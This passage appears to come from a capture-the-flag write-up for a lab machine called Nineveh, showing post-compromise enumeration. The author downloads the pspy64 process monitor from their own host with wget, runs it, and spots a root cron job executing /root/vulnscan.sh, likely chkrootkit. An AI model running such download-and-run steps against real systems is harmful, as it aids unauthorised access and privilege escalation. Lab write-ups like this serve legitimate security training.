Pspy
I found a cronjob running with the system level privileges I want to see what that is.
amrois@nineveh:/tmp$ wget http://10.10.14.5:8000/pspy64 ; chmod 777 pspy64
--2023-01-16 18:40:19-- http://10.10.14.5:8000/pspy64
connecting to 10.10.14.5:8000... connected.
HTTP request sent, awaiting response... 200 OK
length: 3078592 (2.9M) [application/octet-stream]
saving to: ‘pspy64’
pspy64 100%[=============================================================>] 2.94M 3.79MB/s in 0.8s
2023-01-16 18:40:20 (3.79 MB/s) - ‘pspy64’ saved [3078592/3078592]Binary transferred over HTTP
amrois@nineveh:/tmp$ ./pspy64
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
██▓███ ██████ ██▓███ ▓██ ██▓
▓██░ ██▒▒██ ▒ ▓██░ ██▒▒██ ██▒
▓██░ ██▓▒░ ▓██▄ ▓██░ ██▓▒ ▒██ ██░
▒██▄█▓▒ ▒ ▒ ██▒▒██▄█▓▒ ▒ ░ ▐██▓░
▒██▒ ░ ░▒██████▒▒▒██▒ ░ ░ ░ ██▒▓░
▒▓▒░ ░ ░▒ ▒▓▒ ▒ ░▒▓▒░ ░ ░ ██▒▒▒
░▒ ░ ░ ░▒ ░ ░░▒ ░ ▓██ ░▒░
░░ ░ ░ ░ ░░ ▒ ▒ ░░
░ ░ ░
░ ░
config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
doneStarting Pspy
Pspy captured the cronjob.
it’s executing a bash script; /root/vulnscan.sh and that bash script is likely executing chkrootkit